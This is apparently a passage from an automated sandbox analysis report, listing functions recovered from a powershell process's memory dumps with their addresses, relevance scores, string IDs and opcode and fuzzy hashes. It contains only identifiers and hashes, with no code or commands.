                                                                                  • Opcode ID: b0da440ded56dda3444e7c46f9a5dd238d64ab17549496ebb4d53e7f8157a1c8
                                                                                  • Instruction ID: 427880e0fbdc670e3c876822e29c435d1670ee40fa46f6afb1d18fd572f0b279
                                                                                  • Opcode Fuzzy Hash: b0da440ded56dda3444e7c46f9a5dd238d64ab17549496ebb4d53e7f8157a1c8
                                                                                  • Instruction Fuzzy Hash: B6A1A135B002089FDB14EFA4C948A9DBBB6FF84364F118569D402AF369DB74ED49CB40
                                                                                  Function 04E7F1EE Relevance: .3, Instructions: 265COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2402935637.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_4e70000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 533d397a706a58cc740a4f6957bac06b6bc49395b76ad7b08d41c3abc3efca89
                                                                                  • Instruction ID: 5a902e517d93f5ad64855353e06438688aea2410db07390b408643df32094df0
                                                                                  • Opcode Fuzzy Hash: 533d397a706a58cc740a4f6957bac06b6bc49395b76ad7b08d41c3abc3efca89
                                                                                  • Instruction Fuzzy Hash: 41B16E70E00249DFDB10CFA9D9817EDBBF1AF48328F149529E814EB294EB74A845CB81
                                                                                  Function 04E78528 Relevance: .2, Instructions: 225COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2402935637.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_4e70000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8eff66e6363d9b6ee92d198fa4ac0bc7db87b4c12a23aaedfcba2f9e343fc91d
                                                                                  • Instruction ID: 17dd84d286fa28d008cc37a651f9431e63c2559d01b6d7f28b64d3053687afc1
                                                                                  • Opcode Fuzzy Hash: 8eff66e6363d9b6ee92d198fa4ac0bc7db87b4c12a23aaedfcba2f9e343fc91d
                                                                                  • Instruction Fuzzy Hash: 4191B234A01244DFCB15EFA9D4849AEBBF2FF89364F1889A9E0459B361C735EC45CB50
                                                                                  Function 04E72B48 Relevance: .2, Instructions: 221COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2402935637.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_4e70000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: da3c3c28b05bd6a83892b4bbee1800ea61a8866358acfb1eaa0691c8cbc35b3f
                                                                                  • Instruction ID: 30fe9e4ddcb1f47958137aa53d962e7d36a0dedbbfb9fb3810f7a8e6ceb2feb1
                                                                                  • Opcode Fuzzy Hash: da3c3c28b05bd6a83892b4bbee1800ea61a8866358acfb1eaa0691c8cbc35b3f
                                                                                  • Instruction Fuzzy Hash: D0917A74A00645CFCB05CF58C5949AEFBB1FF89320B24859AD615AB3A5C735FC91CBA0
                                                                                  Function 04E79488 Relevance: .2, Instructions: 190COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2402935637.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_4e70000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ab940546458469d737a9ddb7f9bf97716e30e547a2b61eb1e29a806af5a845df
                                                                                  • Instruction ID: e43bed2d514f0f6c1da2e5ef984ee99e3826724bba5b16af0868cc254c57ba68
                                                                                  • Opcode Fuzzy Hash: ab940546458469d737a9ddb7f9bf97716e30e547a2b61eb1e29a806af5a845df
                                                                                  • Instruction Fuzzy Hash: 6171BE70A00219CFDB14DF69C880A9DBBF2FF84324F14856AD40AAB666DB75AC46CF50
                                                                                  Function 04E795F6 Relevance: .2, Instructions: 188COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2402935637.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_4e70000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c77ba3eaa046c37b8176be5419557de3072baa579463e689833683d2d434bfd0
                                                                                  • Instruction ID: ff74481c369c0eb03e006f4b582693b70ba6621b8c9e547913b73d8b05b9c09c
                                                                                  • Opcode Fuzzy Hash: c77ba3eaa046c37b8176be5419557de3072baa579463e689833683d2d434bfd0
                                                                                  • Instruction Fuzzy Hash: F1714B71E002599FEB14DFA5D480AADBBF6FF88314F148429D402AB2A5DB74AD46CF50
                                                                                  Function 04E79473 Relevance: .1, Instructions: 143COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2402935637.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_4e70000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 623317996718510ff245301eea1173d3787c23a26f60fb618f945a0ea545831d
                                                                                  • Instruction ID: 951616435b0a0a0ff7d0c420a5cf90d3fd5b3838ae9aa4bf17518141ef6692dc
                                                                                  • Opcode Fuzzy Hash: 623317996718510ff245301eea1173d3787c23a26f60fb618f945a0ea545831d
                                                                                  • Instruction Fuzzy Hash: 93518170A00219DFEB14DFA9C884BADBBB6FF84314F14942DD406AB656DBB4AC49CF50
                                                                                  Function 074903D6 Relevance: .1, Instructions: 122COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2409471358.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7490000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0b29fe880985c5d42b446a332ff0215a757604f241e624525730814348a5967d
                                                                                  • Instruction ID: fcd0602c7f6e8aabf83eb044c30af931cd90b8d22c451ede77e2281e4abae258
                                                                                  • Opcode Fuzzy Hash: 0b29fe880985c5d42b446a332ff0215a757604f241e624525730814348a5967d
                                                                                  • Instruction Fuzzy Hash: 7241CFF1B45313DFCF20CE288541ABA7FA2AB85250F5984BBD9049B3B5D731D941C7A2
                                                                                  Function 04E79219 Relevance: .1, Instructions: 117COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2402935637.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_4e70000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: bd9df810dc766c37af25e2e016663c0c2cd39a9ad412ceaf2b24438cdf2e8900
                                                                                  • Instruction ID: 6e5797b3793bf722b24436caf5f2486dba00bca56acd5870f5c92267a7e1b8eb
                                                                                  • Opcode Fuzzy Hash: bd9df810dc766c37af25e2e016663c0c2cd39a9ad412ceaf2b24438cdf2e8900
                                                                                  • Instruction Fuzzy Hash: 60418F316002048FDB14EF69D598AAD7BB2FF89314F09506CD406EB7AADB74AC45CB50
                                                                                  Function 04E72C58 Relevance: .1, Instructions: 109COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2402935637.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_4e70000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 43b9155582ca01471f21e3c8fbe0574de656aefd320c57af6ad55b6dcfbe3b2c
                                                                                  • Instruction ID: 09c2673822033a70e53ee40bef61670502ff4cd95d73a0db74a33ddbec20f743
                                                                                  • Opcode Fuzzy Hash: 43b9155582ca01471f21e3c8fbe0574de656aefd320c57af6ad55b6dcfbe3b2c
                                                                                  • Instruction Fuzzy Hash: 8F411774A00505DFCB09CF59C5949AAFBB1FF48324B258599D605AB3A4C732FD90CBA0
                                                                                  Function 04E731C8 Relevance: .1, Instructions: 65COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2402935637.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_4e70000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0782570adc09295c6c636c6da96b904a978bdabfdfe8765f09a84a535c822587
                                                                                  • Instruction ID: bf179cae7b3264b582466407b8636f2e81b4a26d7550c705a3dd7339a08e4b88
                                                                                  • Opcode Fuzzy Hash: 0782570adc09295c6c636c6da96b904a978bdabfdfe8765f09a84a535c822587
                                                                                  • Instruction Fuzzy Hash: 9F215074A042159FCB00CF98C5809AEFBB5FF89310B158596D919EB352C734FD41CBA1
                                                                                  Function 04E731AB Relevance: .1, Instructions: 65COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2402935637.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_4e70000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 089e6b3eb9aee95a0ac44c4b7538fd14dc63708d0be722c680c912cbfad54db5
                                                                                  • Instruction ID: 5ee1339ee400a70d95931f16c6dd4659d257f3c0c8022c44eb0762a2ebdd8970
                                                                                  • Opcode Fuzzy Hash: 089e6b3eb9aee95a0ac44c4b7538fd14dc63708d0be722c680c912cbfad54db5
                                                                                  • Instruction Fuzzy Hash: CC216A74A002098FCB00CF98D9809AEFBB5FF89310B15859AE909EB352C731FD41CBA1
                                                                                  Function 07A50AB8 Relevance: .0, Instructions: 35COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7da55865ab2b81cf4d4491da0e5d05991c1daf840a556143877482f92f96210d
                                                                                  • Instruction ID: a6dac81d20ac1c9a64cdcbce800f2544bb3e631c70faacfe621ac45dd9587c57
                                                                                  • Opcode Fuzzy Hash: 7da55865ab2b81cf4d4491da0e5d05991c1daf840a556143877482f92f96210d
                                                                                  • Instruction Fuzzy Hash: 39F030B1604615EFC3285F28D9C051BB7A6BFC8368B79C93DD86957644CB31AC81CB94
                                                                                  Function 04E7FEBF Relevance: .0, Instructions: 34COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2402935637.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_4e70000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 085b90a9bbf361e60aca2d3c469ceb051d691763da48df457e572b572c195a2b
                                                                                  • Instruction ID: 4dc68193f7b74435675fe271ca0ffff0fb3029d38c603669a1067c452fd11970
                                                                                  • Opcode Fuzzy Hash: 085b90a9bbf361e60aca2d3c469ceb051d691763da48df457e572b572c195a2b
                                                                                  • Instruction Fuzzy Hash: 4C014F71A00109DFCB14CF88D9809ADF7B2FF88324B248668D419A7695CB32EC51CB94
                                                                                  Function 04E7FBD4 Relevance: .0, Instructions: 30COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2402935637.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_4e70000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2bbe84020e3550f99715830be302857c170e477cc31f434508be60de4d2dd373
                                                                                  • Instruction ID: 5aa784f67a0bc2640eb85a4a6e35cb8f4ce6f646120745ddad02ba0f23054e96
                                                                                  • Opcode Fuzzy Hash: 2bbe84020e3550f99715830be302857c170e477cc31f434508be60de4d2dd373
                                                                                  • Instruction Fuzzy Hash: 22F05435A001189FCB40CF9DD8509EDFBBAFF8C324B248159E418A32A5C736EC52CB50

                                                                                  Non-executed Functions

                                                                                  Function 07A5DB90 Relevance: 16.7, Strings: 13, Instructions: 452COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: T\k$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$DU\k$XYll$XYll$$jq$$jq$$jq
                                                                                  • API String ID: 0-237230307
                                                                                  • Opcode ID: 905cf17f2e45dbfe82943e55ae225a9159f2c7491772c17c6d55b104f608391c
                                                                                  • Instruction ID: 07f85bdb9bcc495891acd55b77cb3ad7c734ea6b79a0f789acc3fd262c1acd39
                                                                                  • Opcode Fuzzy Hash: 905cf17f2e45dbfe82943e55ae225a9159f2c7491772c17c6d55b104f608391c
                                                                                  • Instruction Fuzzy Hash: 0CE102B1B4421ACFCB149F68D8846AABBB2EFC5211F14C06ADC25DF255CB35CD45CBA2
                                                                                  Function 07A5F920 Relevance: 15.5, Strings: 12, Instructions: 482COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'jq$4'jq$]$tPjq$tPjq$$jq$$jq$$jq$bl$bl$bl$bl
                                                                                  • API String ID: 0-3057480511
                                                                                  • Opcode ID: 4a9ec03cb610329509ddbaa346c62696ac1ff304c8c07b67dfe8deb347e8e887
                                                                                  • Instruction ID: f2e9eac11f63f2b5d98f3f8a0ccafd6c79179031d85bace7f176359305a344b1
                                                                                  • Opcode Fuzzy Hash: 4a9ec03cb610329509ddbaa346c62696ac1ff304c8c07b67dfe8deb347e8e887
                                                                                  • Instruction Fuzzy Hash: DCF133B2B04216CFCB248F6894106BABBB6EFC5310F14847BDD65CB255DB35C945CBA2
                                                                                  Function 07A52128 Relevance: 12.8, Strings: 10, Instructions: 308COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'jq$4'jq$4'jq$4'jq$$jq$$jq$$jq$$jq$$jq$$jq
                                                                                  • API String ID: 0-2815571254
                                                                                  • Opcode ID: 7c479f24f4e215c62647a746f9b36a4df336b8f28a6b50dbb10a780b5c11a02d
                                                                                  • Instruction ID: 9a185f134f48572b4bd3ad923e5c2413e031c449d790bbece2e65cfb1331af0b
                                                                                  • Opcode Fuzzy Hash: 7c479f24f4e215c62647a746f9b36a4df336b8f28a6b50dbb10a780b5c11a02d
                                                                                  • Instruction Fuzzy Hash: A1A116F17042169FCB298B69D8503BA7BB6FFC1220F14847ADD25CB2D5DA35C845C7A1
                                                                                  Function 07A518C8 Relevance: 12.8, Strings: 10, Instructions: 308COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'jq$4'jq$4'jq$4'jq$tPjq$tPjq$$jq$$jq$$jq$$jq
                                                                                  • API String ID: 0-396422569
                                                                                  • Opcode ID: d7fc84db8ec301b8b699130e7c871bbac99ad5e355efaabb364427bae3bc97d0
                                                                                  • Instruction ID: 96e59ecd5986e25da91d7a967e73df1edf6545a4237e828b294baa7f21d13195
                                                                                  • Opcode Fuzzy Hash: d7fc84db8ec301b8b699130e7c871bbac99ad5e355efaabb364427bae3bc97d0
                                                                                  • Instruction Fuzzy Hash: 1FA146B1B002199FCB159B68C4407BABBA3EFC5310F14C56ADD258B284DB36DD01C7A1
                                                                                  Function 07A5D378 Relevance: 11.4, Strings: 9, Instructions: 191COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (fll$(fll$(fll$(fll$4'jq$4'jq$4il$4il$tL^k
                                                                                  • API String ID: 0-2836958792
                                                                                  • Opcode ID: 243067d015f05bf61c3ba5f0cce9017b15fc0a1ea5249a680141197008abd004
                                                                                  • Instruction ID: 0acf843663c290d422ec381d5814214e5e3c7461b02edac52584887723f4a4dd
                                                                                  • Opcode Fuzzy Hash: 243067d015f05bf61c3ba5f0cce9017b15fc0a1ea5249a680141197008abd004
                                                                                  • Instruction Fuzzy Hash: DD61CEB0B00205DFDB14CB68C590A6ABBF3EFC8714F148469D825AB755CB36EC42CB96
                                                                                  Function 07A5E908 Relevance: 10.4, Strings: 8, Instructions: 404COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 84jl$84jl$84jl$84jl$tPjq$tPjq$tPjq$tPjq
                                                                                  • API String ID: 0-126783722
                                                                                  • Opcode ID: b723be7035dbdad59b810207d5d0d396072d69e2b5563a3f673794fc22a8121a
                                                                                  • Instruction ID: d1a62d26ea336c6ac5985c6bc4212edd09a3a6ce8b2b946ade19b8f9592e1029
                                                                                  • Opcode Fuzzy Hash: b723be7035dbdad59b810207d5d0d396072d69e2b5563a3f673794fc22a8121a
                                                                                  • Instruction Fuzzy Hash: 3BD126B17082159FC7248F68C450A6ABBA2FFC9311F18C86AED169F391DB31DE41C7A5
                                                                                  Function 074925AD Relevance: 10.3, Strings: 8, Instructions: 318COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2409471358.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7490000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 84jl$84jl$84jl$84jl$tPjq$tPjq$tPjq$tPjq
                                                                                  • API String ID: 0-126783722
                                                                                  • Opcode ID: 86c60f5441a20013b65f4c8ea47c1ca5ab97b868fa2625513080bd9e5d6b7ca8
                                                                                  • Instruction ID: 7964a91aa576c77ee813cb439e112a35c4a962c0a862c7bf20c819e1a542a76c
                                                                                  • Opcode Fuzzy Hash: 86c60f5441a20013b65f4c8ea47c1ca5ab97b868fa2625513080bd9e5d6b7ca8
                                                                                  • Instruction Fuzzy Hash: 09C193B570021AAFCF15DF58C550AABBFA6BF85310F148876E9019B390C7B5DC42CBA1
                                                                                  Function 07A5CD96 Relevance: 7.8, Strings: 6, Instructions: 330COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (fll$(fll$4'jq$4'jq$x.]k$-]k
                                                                                  • API String ID: 0-2761045000
                                                                                  • Opcode ID: c3589e3f391fbcedbd0f77b3a955283b01a04b708f333e7776d8f89c59887254
                                                                                  • Instruction ID: 150c70c31cdd6a6b39c46a8faf0f0aba666950c96199fc865699a8308348b5f0
                                                                                  • Opcode Fuzzy Hash: c3589e3f391fbcedbd0f77b3a955283b01a04b708f333e7776d8f89c59887254
                                                                                  • Instruction Fuzzy Hash: 3EC1AFB0B00205DFD724DF54C590BAFBBB2EF88714F148419D8166F759CB76A846CBA1
                                                                                  Function 07A5CDE0 Relevance: 7.8, Strings: 6, Instructions: 299COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (fll$(fll$4'jq$4'jq$x.]k$-]k
                                                                                  • API String ID: 0-2761045000
                                                                                  • Opcode ID: 506850322dbfba520dfdd497c9dd82f03a1fca527ca5b52720a7902ed4e39de8
                                                                                  • Instruction ID: 6e24e1200f961ea248e49b63cecc92a666c3f98bfec06b04f6ab6c843bb34ea8
                                                                                  • Opcode Fuzzy Hash: 506850322dbfba520dfdd497c9dd82f03a1fca527ca5b52720a7902ed4e39de8
                                                                                  • Instruction Fuzzy Hash: 7BC1AFB0B00205DBD724DF94C590B6FBBB2EF88714F148419D8266B758CB76EC46CBA1
                                                                                  Function 07A5C089 Relevance: 7.7, Strings: 6, Instructions: 223COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'jq$4'jq$4'jq$k$x.]k$-]k
                                                                                  • API String ID: 0-4211736190
                                                                                  • Opcode ID: 87281e22a95bb02df7f7285adaf8e230a85cd1a25a15ec7a1579d18fabd58eef
                                                                                  • Instruction ID: 9726f9a4e6398f22b815e76ec1e008215e45d7c850fea2acae7202d79194b7ec
                                                                                  • Opcode Fuzzy Hash: 87281e22a95bb02df7f7285adaf8e230a85cd1a25a15ec7a1579d18fabd58eef
                                                                                  • Instruction Fuzzy Hash: 53A17FB0A402298FDB24DB14C951BEEB7B2EB85704F1080D9D9096B345CB75AE85CFA5
                                                                                  Function 07A58970 Relevance: 7.7, Strings: 6, Instructions: 209COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'jq$4'jq$$jq$$jq$$jq$$jq
                                                                                  • API String ID: 0-210473685
                                                                                  • Opcode ID: 03852be11e5b1806f05c3863d62421edefd5b0155fe591594cdc69b89122bf3f
                                                                                  • Instruction ID: c77ece671f6b532d548f9947d65f750afb16b68214bc64affd9c65d63adcf434
                                                                                  • Opcode Fuzzy Hash: 03852be11e5b1806f05c3863d62421edefd5b0155fe591594cdc69b89122bf3f
                                                                                  • Instruction Fuzzy Hash: 846103B170420ADFCB248F69D4002BABBB6EFC5221F15C07ADD298B251DB39DD41C7A1
                                                                                  Function 07A5A1A8 Relevance: 7.7, Strings: 6, Instructions: 185COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'jq$84jl$tPjq$$jq$$jq$$jq
                                                                                  • API String ID: 0-2425343769
                                                                                  • Opcode ID: 3ee56ae552e550f38510e8b3012e1a526ff6d9ce7209c28806948972eaea805d
                                                                                  • Instruction ID: 536c61de060080f8f1304c0d35e5a550ab52e6b1196ba5a15274daddebc11970
                                                                                  • Opcode Fuzzy Hash: 3ee56ae552e550f38510e8b3012e1a526ff6d9ce7209c28806948972eaea805d
                                                                                  • Instruction Fuzzy Hash: 71618FB4710206DFDB288F54C5497BA7FB2BB85315F54C266EC216B2A0CB75DD80CBA2
                                                                                  Function 07A5D35B Relevance: 6.4, Strings: 5, Instructions: 164COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (fll$(fll$4'jq$4il$tL^k
                                                                                  • API String ID: 0-923200292
                                                                                  • Opcode ID: 911559092380c397db08bc7a418d39470e93c6fb519a5e44b1390d3e0cea9263
                                                                                  • Instruction ID: 3efb3ead2af410c67f3036b38f2a9bec59dda90083593a998291513dfd91d572
                                                                                  • Opcode Fuzzy Hash: 911559092380c397db08bc7a418d39470e93c6fb519a5e44b1390d3e0cea9263
                                                                                  • Instruction Fuzzy Hash: 7F5180B0B00205DBDB14CF58C590AAABBF3EF89714F14C569D829AB751CB36E841CF92
                                                                                  Function 07A530D8 Relevance: 6.4, Strings: 5, Instructions: 151COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $ak$84jl$84jl$tPjq$tPjq
                                                                                  • API String ID: 0-1376893690
                                                                                  • Opcode ID: fe96651855570f82a0e8db17aee5e6677f642e7621b80cb604c4ba3b00996db9
                                                                                  • Instruction ID: 99745bd250b849cf7257233698a8bf64e07b922e908f359a919353f07115330e
                                                                                  • Opcode Fuzzy Hash: fe96651855570f82a0e8db17aee5e6677f642e7621b80cb604c4ba3b00996db9
                                                                                  • Instruction Fuzzy Hash: F3414371704315AFCF209B699800B6ABBB6FFC5798F18C46AED549F285CA32CC01C7A1
                                                                                  Function 07A518A7 Relevance: 6.4, Strings: 5, Instructions: 124COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
